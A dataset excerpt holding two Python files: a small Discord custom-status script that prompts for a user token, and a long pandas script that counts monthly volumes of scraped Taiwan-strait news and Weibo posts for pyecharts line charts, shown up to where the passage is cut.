metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "13-05/discord.RED",
"score": 3
} |
#### File: 13-05/discord.RED/red_rpc.py
```python
import discord
import asyncio
from colorama import init, Fore, Back, Style
import os
def custom_rpc():
client = discord.Client()
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
init()
print(f"{Fore.BLUE}Your Token: ", end='')
TOKEN = input()
@client.event
async def on_ready():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print(f"{Fore.BLUE}Status message: ", end='')
STATUS = input()
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
await client.change_presence(status=discord.Status.idle, activity=discord.Game(STATUS))
print(f"{Fore.RED}{client.user}'s status{Fore.MAGENTA} is now {Fore.BLUE}\"{STATUS}\"{Fore.MAGENTA}.")
client.run(TOKEN,bot=False)
``` |
{
"source": "13060923171/Crawl-Project2",
"score": 3
} |
#### File: 台海舆论-数据分析(可视化系统)/demo/Terrace_Line.py
```python
import pandas as pd
import pyecharts.options as opts
from pyecharts.charts import Line
from pyecharts.globals import ThemeType
def weibo_sum():
df1 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/1.xlsx').loc[:,['from']]
sum_weibo = []
for d1 in df1['from']:
d1 = str(d1)
d1 = d1[0:8]
sum_weibo.append(d1)
df2 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/2.xlsx').loc[:,['from']]
for d2 in df2['from']:
d2 = str(d2)
d2 = d2[0:8]
if 'nan' not in d2:
sum_weibo.append(d2)
df3 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/3.xlsx').loc[:,['from']]
for d3 in df3['from']:
d3 = str(d3)
d3 = d3[0:8]
if 'nan' not in d3:
sum_weibo.append(d3)
df4 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/4.xlsx').loc[:,['from']]
for d4 in df4['from']:
d4 = str(d4)
d4 = d4[0:8]
if 'nan' not in d4:
sum_weibo.append(d4)
df5 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/4.xlsx').loc[:,['from']]
for d5 in df5['from']:
d5 = str(d5)
d5 = d5[0:8]
if 'nan' not in d5:
sum_weibo.append(d5)
df6 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/6.xlsx').loc[:,['from']]
for d6 in df6['from']:
d6 = str(d6)
d6 = d6[0:8]
if 'nan' not in d6:
sum_weibo.append(d6)
df7 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/7.xlsx').loc[:, ['from']]
for d7 in df7['from']:
d7 = str(d7)
d7 = d7[0:8]
if 'nan' not in d7:
sum_weibo.append(d7)
df8 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/8.xlsx').loc[:, ['from']]
for d8 in df8['from']:
d8 = str(d8)
d8 = d8[0:8]
if 'nan' not in d8:
sum_weibo.append(d8)
df9 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/9.xlsx').loc[:, ['from']]
for d9 in df9['from']:
d9 = str(d9)
d9 = d9[0:8]
if 'nan' not in d9:
sum_weibo.append(d9)
df10 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/10.xlsx').loc[:, ['from']]
for d10 in df10['from']:
d10 = str(d10)
d10 = d10[0:8]
if 'nan' not in d10:
sum_weibo.append(d10)
df11 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/11.xlsx').loc[:, ['from']]
for d11 in df11['from']:
d11 = str(d11)
d11 = d11[0:8]
if 'nan' not in d11:
sum_weibo.append(d11)
df12 = pd.read_excel('./台湾文本-数据/微博/微博台海局势1-12月/12.xlsx').loc[:, ['from']]
for d12 in df12['from']:
d12 = str(d12)
d12 = d12[0:8]
if 'nan' not in d12:
sum_weibo.append(d12)
df13 = pd.read_excel('./台湾文本-数据/微博/两岸关系微博.xlsx').loc[:, ['from']]
for d13 in df13['from']:
d13 = str(d13)
d13 = d13[0:8]
if 'nan' not in d13:
sum_weibo.append(d13)
df14 = pd.read_excel('./台湾文本-数据/微博/微博中国内政.xlsx').loc[:, ['from']]
for d14 in df14['from']:
d14 = str(d14)
d14 = d14[0:8]
if 'nan' not in d14:
sum_weibo.append(d14)
df15 = pd.read_excel('./台湾文本-数据/微博/微博分裂势力.xlsx').loc[:, ['from']]
for d15 in df15['from']:
d15 = str(d15)
d15 = d15[0:8]
if 'nan' not in d15:
sum_weibo.append(d15)
df16 = pd.read_excel('./台湾文本-数据/微博/微博台军.xlsx').loc[:, ['from']]
for d16 in df16['from']:
d16 = str(d16)
d16 = d16[0:8]
if 'nan' not in d16:
sum_weibo.append(d16)
df17 = pd.read_excel('./台湾文本-数据/微博/微博台湾政治.xlsx').loc[:, ['from']]
for d17 in df17['from']:
d17 = str(d17)
d17 = d17[0:8]
if 'nan' not in d17:
sum_weibo.append(d17)
df18 = pd.read_excel('./台湾文本-数据/微博/微博台湾海峡.xlsx').loc[:, ['from']]
for d18 in df18['from']:
d18 = str(d18)
d18 = d18[0:8]
if 'nan' not in d18:
sum_weibo.append(d18)
df19 = pd.read_excel('./台湾文本-数据/微博/微博台湾牌.xlsx').loc[:, ['from']]
for d19 in df19['from']:
d19 = str(d19)
d19 = d19[0:8]
if 'nan' not in d19:
sum_weibo.append(d19)
df20 = pd.read_excel('./台湾文本-数据/微博/微博台湾疫情.xlsx').loc[:, ['from']]
for d20 in df20['from']:
d20 = str(d20)
d20 = d20[0:8]
if 'nan' not in d20:
sum_weibo.append(d20)
df21 = pd.read_excel('./台湾文本-数据/微博/微博台湾经济.xlsx').loc[:, ['from']]
for d21 in df21['from']:
d21 = str(d21)
d21 = d21[0:8]
if 'nan' not in d21:
sum_weibo.append(d21)
df22 = pd.read_excel('./台湾文本-数据/微博/微博台独.xlsx').loc[:, ['from']]
for d22 in df22['from']:
d22 = str(d22)
d22 = d22[0:8]
if 'nan' not in d22:
sum_weibo.append(d22)
df23 = pd.read_excel('./台湾文本-数据/微博/微博和平统一.xlsx').loc[:, ['from']]
for d23 in df23['from']:
d23 = str(d23)
d23 = d23[0:8]
if 'nan' not in d23:
sum_weibo.append(d23)
df24 = pd.read_excel('./台湾文本-数据/微博/微博拜登台湾.xlsx').loc[:, ['from']]
for d24 in df24['from']:
d24 = str(d24)
d24 = d24[0:8]
if 'nan' not in d24:
sum_weibo.append(d24)
df25 = pd.read_excel('./台湾文本-数据/微博/微博武统.xlsx').loc[:, ['from']]
for d25 in df25['from']:
d25 = str(d25)
d25 = d25[0:8]
if 'nan' not in d25:
sum_weibo.append(d25)
df26 = pd.read_excel('./台湾文本-数据/微博/微博特朗普台湾.xlsx').loc[:, ['from']]
for d26 in df26['from']:
d26 = str(d26)
d26 = d26[0:8]
if 'nan' not in d26:
sum_weibo.append(d26)
df27 = pd.read_excel('./台湾文本-数据/微博/微博美台.xlsx').loc[:, ['from']]
for d27 in df27['from']:
d27 = str(d27)
d27 = d27[0:8]
if 'nan' not in d27:
sum_weibo.append(d27)
df28 = pd.read_excel('./台湾文本-数据/微博/微博蔡英文.xlsx').loc[:, ['from1']]
for d28 in df28['from1']:
d28 = str(d28)
d28 = d28[0:8]
if 'nan' not in d28:
sum_weibo.append(d28)
df29 = pd.read_excel('./台湾文本-数据/微博/微博领土主权.xlsx').loc[:, ['from']]
for d29 in df29['from']:
d29 = str(d29)
d29 = d29[0:8]
if 'nan' not in d29:
sum_weibo.append(d29)
d = {}
for s in sum_weibo:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=True)
del ls[-10:]
del ls[0]
return ls
def huanqiuw_sum():
df = pd.read_excel('./台湾文本-数据/环球网/环球网台海.xlsx').loc[:, ['time']]
sum_list = []
for d in df['time']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def zhongguotaiwanwang():
df1 = pd.read_excel('./台湾文本-数据/中国台湾网/两岸.xlsx').loc[:, ['info']]
sum_list = []
for d1 in df1['info']:
d1 = str(d1)
d1 = d1[0:7]
if 'nan' not in d1:
sum_list.append(d1)
df2 = pd.read_excel('./台湾文本-数据/中国台湾网/两岸快评.xlsx').loc[:, ['info']]
for d2 in df2['info']:
d2 = str(d2)
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/中国台湾网/台商.xlsx').loc[:, ['info']]
for d3 in df3['info']:
d3 = str(d3)
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/中国台湾网/台湾自2020年12月-2021.1.4时事.xlsx').loc[:, ['info']]
for d4 in df4['info']:
d4 = str(d4)
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/中国台湾网/文化.xlsx').loc[:, ['info']]
for d5 in df5['info']:
d5 = str(d5)
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/中国台湾网/海峡时评.xlsx').loc[:, ['info']]
for d6 in df6['info']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/中国台湾网/经贸.xlsx').loc[:, ['info']]
for d7 in df7['info']:
d7 = str(d7)
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/中国台湾网/网友专栏.xlsx').loc[:, ['日期时间']]
for d8 in df8['日期时间']:
d8 = str(d8).replace('年','-')
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/中国台湾网/网友快言.xlsx').loc[:, ['info']]
for d9 in df9['info']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/中国台湾网/萧萧话两岸.xlsx').loc[:, ['info']]
for d10 in df10['info']:
d10 = str(d10)
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/中国台湾网/部委.xlsx').loc[:, ['info']]
for d11 in df11['info']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=True)
del ls[-13:]
return ls
def zhihu():
df = pd.read_excel('./台湾文本-数据/知乎/知乎台海局势的数据.xlsx').loc[:, ['ContentItem-action']]
sum_list = []
for d in df['ContentItem-action']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[0:13]
del ls[-2:]
return ls
def ribao_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d.replace('年', '-')
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网台海局势.xlsx').loc[:, ['日期时间']]
for d2 in df2['日期时间']:
d2 = str(d2)
d2 = d2.replace('年', '-')
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网台湾牌.xlsx').loc[:, ['日期时间']]
for d3 in df3['日期时间']:
d3 = str(d3)
d3 = d3.replace('年', '-')
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/中国日报网/中国日报网和平统一.xlsx').loc[:, ['日期时间']]
for d4 in df4['日期时间']:
d4 = str(d4)
d4 = d4.replace('年', '-')
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/中国日报网/微博民进党.xlsx').loc[:, ['from']]
for d5 in df5['from']:
d5 = str(d5)
d5 = d5.replace('年','-')
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def zhongxing_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/中新网/中新网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/中新网/中新网台海局势.xlsx').loc[:, ['日期时间']]
for d2 in df2['日期时间']:
d2 = str(d2)
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/中新网/中新网台军.xlsx').loc[:, ['日期时间']]
for d3 in df3['日期时间']:
d3 = str(d3)
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾政治.xlsx').loc[:, ['日期时间']]
for d4 in df4['日期时间']:
d4 = str(d4)
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾海峡.xlsx').loc[:, ['日期时间']]
for d5 in df5['日期时间']:
d5 = str(d5)
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾牌.xlsx').loc[:, ['日期时间']]
for d6 in df6['日期时间']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾疫情.xlsx').loc[:, ['日期时间']]
for d7 in df7['日期时间']:
d7 = str(d7)
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/中新网/中新网台湾经济.xlsx').loc[:, ['日期时间']]
for d8 in df8['日期时间']:
d8 = str(d8)
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/中新网/中新网台独.xlsx').loc[:, ['日期时间']]
for d9 in df9['日期时间']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/中新网/中新网和平统一.xlsx').loc[:, ['日期时间']]
for d10 in df10['日期时间']:
d10 = str(d10)
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/中新网/中新网武统.xlsx').loc[:, ['日期时间']]
for d11 in df11['日期时间']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/中新网/中新网民进党.xlsx').loc[:, ['日期时间']]
for d12 in df12['日期时间']:
d12 = str(d12)
d12 = d12[0:7]
if 'nan' not in d12:
sum_list.append(d12)
df13 = pd.read_excel('./台湾文本-数据/中新网/中新网美台.xlsx').loc[:, ['日期时间']]
for d13 in df13['日期时间']:
d13 = str(d13)
d13 = d13[0:7]
if 'nan' not in d13:
sum_list.append(d13)
df14 = pd.read_excel('./台湾文本-数据/中新网/中新网蔡英文.xlsx').loc[:, ['日期时间']]
for d14 in df14['日期时间']:
d14 = str(d14)
d14 = d14[0:7]
if 'nan' not in d14:
sum_list.append(d14)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[0:46]
return ls
def jinri_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/今日头条/今日头条两岸关系.xlsx').loc[:, ['lbtn1']]
for d in df['lbtn1']:
d = str(d)
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台军.xlsx').loc[:, ['lbtn1']]
for d2 in df2['lbtn1']:
d2 = str(d2)
if 'nan' not in d2:
sum_list.append(d2)
df3 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台海局势.xlsx').loc[:, ['time']]
for d3 in df3['time']:
d3 = str(d3)
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾政治.xlsx').loc[:, ['lbtn1']]
for d4 in df4['lbtn1']:
d4 = str(d4)
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾海峡.xlsx').loc[:, ['lbtn1']]
for d5 in df5['lbtn1']:
d5 = str(d5)
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾牌.xlsx').loc[:, ['lbtn1']]
for d6 in df6['lbtn1']:
d6 = str(d6)
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台湾疫情.xlsx').loc[:, ['lbtn1']]
for d7 in df7['lbtn1']:
d7 = str(d7)
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/今日头条/今日头条台独.xlsx').loc[:, ['lbtn1']]
for d8 in df8['lbtn1']:
d8 = str(d8)
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/今日头条/今日头条和平统一.xlsx').loc[:, ['lbtn1']]
for d9 in df9['lbtn1']:
d9 = str(d9)
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/今日头条/今日头条拜登台湾.xlsx').loc[:, ['lbtn1']]
for d10 in df10['lbtn1']:
d10 = str(d10)
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/今日头条/今日头条武统.xlsx').loc[:, ['lbtn1']]
for d11 in df11['lbtn1']:
d11 = str(d11)
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/今日头条/今日头条民进党.xlsx').loc[:, ['lbtn1']]
for d12 in df12['lbtn1']:
d12 = str(d12)
if 'nan' not in d12:
sum_list.append(d12)
df13= pd.read_excel('./台湾文本-数据/今日头条/今日头条特朗普台湾.xlsx').loc[:, ['lbtn1']]
for d13 in df13['lbtn1']:
d13 = str(d13)
if 'nan' not in d13:
sum_list.append(d13)
df14 = pd.read_excel('./台湾文本-数据/今日头条/今日头条美台.xlsx').loc[:, ['lbtn1']]
for d14 in df14['lbtn1']:
d14 = str(d14)
if 'nan' not in d14:
sum_list.append(d14)
df15 = pd.read_excel('./台湾文本-数据/今日头条/今日头条蔡英文.xlsx').loc[:, ['lbtn1']]
for d15 in df15['lbtn1']:
d15 = str(d15)
if 'nan' not in d15:
sum_list.append(d15)
df16 = pd.read_excel('./台湾文本-数据/今日头条/台湾经济.xlsx').loc[:, ['lbtn1']]
for d16 in df16['lbtn1']:
d16 = str(d16)
if 'nan' not in d16:
sum_list.append(d16)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def guangming_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/光明网/光明网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df2 = pd.read_excel('./台湾文本-数据/光明网/光明网台军.xlsx').loc[:, ['m-news-box2']]
for d2 in df2['m-news-box2']:
d2 = str(d2)
d2 = d2[0:7]
if 'nan' not in d2:
sum_list.append(d2)
df4 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾政治.xlsx').loc[:, ['m-news-box1']]
for d4 in df4['m-news-box1']:
d4 = str(d4)
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾海峡.xlsx').loc[:, ['m-news-box1']]
for d5 in df5['m-news-box1']:
d5 = str(d5)
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾牌.xlsx').loc[:, ['日期时间']]
for d6 in df6['日期时间']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾疫情.xlsx').loc[:, ['m-news-box1']]
for d7 in df7['m-news-box1']:
d7 = str(d7)
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/光明网/光明网台湾经济.xlsx').loc[:, ['m-news-box1']]
for d8 in df8['m-news-box1']:
d8 = str(d8)
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/光明网/光明网台独.xlsx').loc[:, ['m-news-box1']]
for d9 in df9['m-news-box1']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/光明网/光明网和平统一.xlsx').loc[:, ['日期时间']]
for d10 in df10['日期时间']:
d10 = str(d10)
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/光明网/光明网武统.xlsx').loc[:, ['m-news-box1']]
for d11 in df11['m-news-box1']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/光明网/光明网民进党.xlsx').loc[:, ['m-news-box1']]
for d12 in df12['m-news-box1']:
d12 = str(d12)
d12 = d12[0:7]
if 'nan' not in d12:
sum_list.append(d12)
df13 = pd.read_excel('./台湾文本-数据/光明网/光明网蔡英文.xlsx').loc[:, ['m-news-box1']]
for d13 in df13['m-news-box1']:
d13 = str(d13)
d13 = d13[0:7]
if 'nan' not in d13:
sum_list.append(d13)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[0:20]
return ls
def fenghuan_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/凤凰网/凤凰台军.xlsx').loc[:, ['字段2']]
for d in df['字段2']:
d = str(d)
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df3 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰台湾海峡.xlsx').loc[:, ['字段2']]
for d3 in df3['字段2']:
d3 = str(d3)
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df6 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰台独.xlsx').loc[:, ['字段2']]
for d6 in df6['字段2']:
d6 = str(d6)
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df9 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰民进党.xlsx').loc[:, ['字段2']]
for d9 in df9['字段2']:
d9 = str(d9)
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df11 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰网两岸关系.xlsx').loc[:, ['字段2']]
for d11 in df11['字段2']:
d11 = str(d11)
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df14 = pd.read_excel('./台湾文本-数据/凤凰网/凤凰网和平统一.xlsx').loc[:, ['字段2']]
for d14 in df14['字段2']:
d14 = str(d14)
d14 = d14[0:7]
if 'nan' not in d14:
sum_list.append(d14)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[-18:]
del ls[0:36]
ls.append(('2021/01',36))
return ls
def xinhua_sum():
sum_list = []
df = pd.read_excel('./台湾文本-数据/新华网/新华网两岸关系.xlsx').loc[:, ['日期时间']]
for d in df['日期时间']:
d = str(d)
d = d.replace('新华网\\u2003\\t\\t\\t\\t', '')
d = d[0:7]
if 'nan' not in d:
sum_list.append(d)
df3 = pd.read_excel('./台湾文本-数据/新华网/新华网台海局势.xlsx').loc[:, ['newstime']]
for d3 in df3['newstime']:
d3 = str(d3)
d3 = d3.replace('新华网\\u2003\\t\\t\\t\\t', '')
d3 = d3[0:7]
if 'nan' not in d3:
sum_list.append(d3)
df4 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾政治.xlsx').loc[:, ['newstime']]
for d4 in df4['newstime']:
d4 = str(d4)
d4 = d4.replace('新华网\\u2003\\t\\t\\t\\t', '')
d4 = d4[0:7]
if 'nan' not in d4:
sum_list.append(d4)
df5 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾海峡.xlsx').loc[:, ['newstime']]
for d5 in df5['newstime']:
d5 = str(d5)
d5 = d5.replace('新华网\\u2003\\t\\t\\t\\t', '')
d5 = d5[0:7]
if 'nan' not in d5:
sum_list.append(d5)
df6 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾牌.xlsx').loc[:, ['newstime']]
for d6 in df6['newstime']:
d6 = str(d6)
d6 = d6.replace('新华网\\u2003\\t\\t\\t\\t', '')
d6 = d6[0:7]
if 'nan' not in d6:
sum_list.append(d6)
df7 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾疫情.xlsx').loc[:, ['newstime']]
for d7 in df7['newstime']:
d7 = str(d7)
d7 = d7.replace('新华网\\u2003\\t\\t\\t\\t', '')
d7 = d7[0:7]
if 'nan' not in d7:
sum_list.append(d7)
df8 = pd.read_excel('./台湾文本-数据/新华网/新华网台湾经济.xlsx').loc[:, ['newstime']]
for d8 in df8['newstime']:
d8 = str(d8)
d8 = d8.replace('新华网\\u2003\\t\\t\\t\\t', '')
d8 = d8[0:7]
if 'nan' not in d8:
sum_list.append(d8)
df9 = pd.read_excel('./台湾文本-数据/新华网/新华网台独.xlsx').loc[:, ['newstime']]
for d9 in df9['newstime']:
d9 = str(d9)
d9 = d9.replace('新华网\\u2003\\t\\t\\t\\t', '')
d9 = d9[0:7]
if 'nan' not in d9:
sum_list.append(d9)
df10 = pd.read_excel('./台湾文本-数据/新华网/新华网和平统一.xlsx').loc[:, ['newstime']]
for d10 in df10['newstime']:
d10 = str(d10)
d10 = d10.replace('新华网\\u2003\\t\\t\\t\\t', '')
d10 = d10[0:7]
if 'nan' not in d10:
sum_list.append(d10)
df11 = pd.read_excel('./台湾文本-数据/新华网/新华网武统.xlsx').loc[:, ['newstime']]
for d11 in df11['newstime']:
d11 = str(d11)
d11 = d11.replace('新华网\\u2003\\t\\t\\t\\t', '')
d11 = d11[0:7]
if 'nan' not in d11:
sum_list.append(d11)
df12 = pd.read_excel('./台湾文本-数据/新华网/新华网民进党.xlsx').loc[:, ['newstime']]
for d12 in df12['newstime']:
d12 = str(d12)
d12 = d12.replace('新华网\\u2003\\t\\t\\t\\t', '')
d12 = d12[0:7]
if 'nan' not in d12:
sum_list.append(d12)
df13 = pd.read_excel('./台湾文本-数据/新华网/新华网美台.xlsx').loc[:, ['newstime']]
for d13 in df13['newstime']:
d13 = str(d13)
d13 = d13.replace('新华网\\u2003\\t\\t\\t\\t', '')
d13 = d13[0:7]
if 'nan' not in d13:
sum_list.append(d13)
df14 = pd.read_excel('./台湾文本-数据/新华网/新华网蔡英文.xlsx').loc[:, ['newstime']]
for d14 in df14['newstime']:
d14 = str(d14)
d14 = d14.replace('新华网\\u2003\\t\\t\\t\\t', '')
d14 = d14[0:7]
d14 = d14.replace('新华网\\u2003\\t\\t\\t\\t','')
if 'nan' not in d14:
sum_list.append(d14)
d = {}
for s in sum_list:
d[s] = d.get(s, 0) + 1
ls = list(d.items())
ls.sort(key=lambda x: x[0], reverse=False)
del ls[-13:]
del ls[0:10]
ls.append(('2020-02', 0))
ls.append(('2020-03', 0))
ls.append(('2020-04', 0))
ls.append(('2020-05', 0))
ls.append(('2020-06', 0))
ls.append(('2020-07', 0))
ls.append(('2020-10', 0))
ls.sort(key=lambda x: x[0], reverse=False)
return ls
def terrace_line():
list1 = weibo_sum()
list1.sort(key=lambda x: x[0], reverse=False)
x_data1 = []
y_data1 = []
for l in list1:
x = l[0].replace('年','-').replace('月','')
x_data1.append(x)
y_data1.append(l[1])
list2 = huanqiuw_sum()
x_data2 = []
y_data2 = []
for l in list2:
x_data2.append(l[0])
y_data2.append(l[1])
y_data2.insert(0,0)
y_data2.insert(0,0)
y_data2.insert(0,0)
list3 = zhongguotaiwanwang()
x_data3 = []
y_data3 = []
list3.sort(key=lambda x: x[0], reverse=False)
for l in list3:
x_data3.append(l[0])
y_data3.append(l[1])
list4 = zhihu()
x_data4 = []
y_data4 = []
for l in list4:
x_data4.append(l[0])
y_data4.append(l[1])
y_data4.insert(1,0)
list5 = ribao_sum()
x_data5 = []
y_data5 = []
list5.sort(key=lambda x: x[0], reverse=False)
for l in list5:
x_data5.append(l[0])
y_data5.append(l[1])
list6 = zhongxing_sum()
x_data6 = []
y_data6 = []
list6.sort(key=lambda x: x[0], reverse=False)
for l in list6:
x_data6.append(l[0])
y_data6.append(l[1])
list7 = jinri_sum()
x_data7 = ['2020-01', '2020-02', '2020-03', '2020-04', '2020-05', '2020-06', '2020-07', '2020-08', '2020-09', '2020-10', '2020-11', '2020-12', '2021-01']
y_data7 = [315, 255, 172, 84, 85, 30,42,36,64,14, 3, 141, 308]
list8 = guangming_sum()
x_data8 = []
y_data8 = []
list8.sort(key=lambda x: x[0], reverse=False)
for l in list8:
x_data8.append(l[0])
y_data8.append(l[1])
list9 = fenghuan_sum()
x_data9 = []
y_data9 = []
list9.sort(key=lambda x: x[0], reverse=False)
for l in list9:
x = l[0].replace('/','-')
x_data9.append(x)
y_data9.append(l[1])
list10 = xinhua_sum()
x_data10 = []
y_data10 = []
list10.sort(key=lambda x: x[0], reverse=False)
for l in list10:
x_data10.append(l[0])
y_data10.append(l[1])
